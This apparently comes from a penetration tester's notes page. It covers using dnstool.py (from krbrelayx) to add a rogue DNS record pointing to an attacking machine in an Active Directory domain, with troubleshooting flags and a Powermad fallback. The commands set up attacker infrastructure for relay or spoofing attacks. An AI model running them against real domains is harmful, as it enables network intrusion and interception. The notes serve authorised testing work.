# dnstool.py

This [script](https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py) helps you add DNS records to the domain (which members of `Domain Users` can by default):

## Add a rogue DNS record that points to your attacking box
```
dnstool.py -u 'tangent\any-valid-AD-user' -p 'Supersecretpassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER
```

## Troubleshooting

If you get an error like this:
```
[!] LDAP operation failed. Message returned from server: noSuchObject 0000208D: NameErr: DSID-0310023C, problem 2001 (NO_OBJECT), data 0, best match of:
        'CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com'
```

Then rerun the command but add `--legacy` flag to the command.

Another time even the `--legacy` flag wouldn't save me.  So I ran:

```
dnstool.py -u 'domain.com\brian' -p 'JingleAllTheWay1996!' --print-zones 10.7.7.7
```

The output could look something like this:
```
[-] Found 6 forest DNS zones:
    ..TrustAnchors
    x.x.x.in-addr.arpa
    x.x.x.in-addr.arpa
    x.x.x.in-addr.arpa
    au.domain.com
CNF:xxx-xxx-xxx-xxx
    domain.com
```

If you see `domain.com` in this output, try running `dnstool.py` again but with the `--forest` flag:

```
dnstool.py -u 'domain.com\brian' -p 'JingleAllTheWay1996!' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER --forest
```

If all else fails:
I had a test recently where the tool was throwing errors having to do with LDAP/SSL, and long story short, it was easier to add the record on the Windows side with [Powermad](/pentesting/Internal/powermad).